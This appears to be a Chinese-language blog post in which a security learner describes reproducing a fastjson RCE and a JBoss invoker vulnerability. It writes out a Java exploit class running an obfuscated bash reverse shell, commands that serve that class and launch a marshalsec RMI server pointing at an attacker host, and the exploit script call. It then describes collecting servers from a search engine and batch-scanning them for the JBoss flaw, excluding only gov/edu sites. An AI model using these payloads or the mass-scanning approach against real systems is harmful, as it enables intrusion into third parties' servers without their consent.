海量编程文章、技术教程与实战案例

网站首页 > 技术文章 正文

记录程序第一天挖漏洞的过程(漏洞挖掘过程)

yimeika 2025-07-28 22:52:35 技术文章 6 ℃

第一个漏洞复现fastjson漏洞

说明:

在本地这个fastjson会出现问题

复现的过程

生成一个java文件进行攻击注入的方式

javac Exploit.java

但是必须编译成.class文件才能执行

public class Exploit {
    static {
        try {
            String cmd = "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}";
            Runtime.getRuntime().exec(cmd);
        } catch (Exception e) {}
    }
}

代码主要就是shell反弹的方式

启动http服务器将文件上传到服务器中进行访问

如果成功访问到.class文件说明成功了

python3 -m http.server --bind 0.0.0.0 8888

打开rmi服务

我不知道这个服务的作用是什么

但是问题总是出现在这个服务互上

"http://x.x.x.x:8888/ 这个对应的攻击主机的地址

9999 是 rmi 端口号

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://x.x.x.x:8888/#Exploit" 9999

组合命令的方式rmi/ladp的方式

java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 9999 "touch /tmp/233"

最后一个就是发送的方式

http://1.1.1.1:8080/ 攻击主机的地址


rmi://2.2.2.2:9999/Exploit rmi 具体服务的地址信息

python3 fastjson-1.2.47_rce.py http://1.1.1.1:8080/ rmi://2.2.2.2:9999/Exploit

但是最后没有成功复现出结果

最后出现问题在我的服务器上面

说没有发送post指令

但是服务器本来没有post请求功能

我在java本地执行window弹出计算机的方式

访问get请求结果真的有计算机进行弹出的方式

搞了挺久还是没有做出来的方式

但是就是没有成功


jboss漏洞复现的方式

这个漏洞验证的方式比较简单一点

http:/ip+端口/invoker/readonly

直接使用这个进行访问

如果出现500错误

证明存在这个错误信息

如果没有我们进行下一个扫描的方式

如果找到大量可以扫描地址

但是需要记住千万不能扫描 gov edu 这个网址

fqfa网络空间查询

我们可以这里查询可以扫描的服务器信息

进行一个扫描的方式

使用burtsuite进行一个批量的查询的方式

但是导出的fqfa把端口和ip分开了我们需要使用notpad++进行组合

然后进行一个暴力扫描的方式

查看网站是否存在这个样的漏洞信息

扫描出来的结果还是比较少的方式

总结

学习网络安全

最主要还是学习思路

如何扫描一个网站,出现什么情况,证明这个网站可以被扫描,出现什么现象我们有机会

这个很重要,如果什么都没有出现,这个网站很难拿下

为什么想学习网络安全

因为安全学习的好

可以参加护网行动

也可以证明自己的技术

最近发表
标签列表